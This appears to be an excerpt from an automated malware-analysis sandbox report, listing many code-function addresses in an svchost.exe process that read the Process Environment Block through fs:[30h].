            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]1_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]1_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]1_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]1_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]1_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]1_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]1_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]1_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]1_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]1_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]1_2_034EA456
